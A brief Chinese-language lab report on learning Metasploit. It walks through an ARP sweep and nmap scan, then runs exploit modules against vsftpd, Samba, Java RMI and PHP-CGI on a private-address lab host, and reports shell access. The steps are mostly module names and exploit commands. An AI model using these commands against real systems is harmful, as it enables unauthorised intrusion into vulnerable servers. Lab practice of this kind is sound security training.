一.实验内容:本实践目标是掌握metasploit的用法。
二.实验过程:
1.首先打开msf,并搜索arp相关的指令
接下来我们需要用到use auxiliary/scanner/discovery/arp_sweep这个指令
随后指定攻击的ip地址,并开始用nmap进行端口扫描
2.输入use exploit/unix/ftp/vsftpd_234_backdoor进行攻击,payload需要指定RHOSTS
接下来就能看到攻击成功
3.use exploit/multi/samba/usermap_script
set RHOST 192.168.1.105
exploit
利用成功 执行uname–a验证
4.use exploit/multi/misc/java_rmi_server,随后用options查看需要设置什么东西
5.use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.1.105
exploit
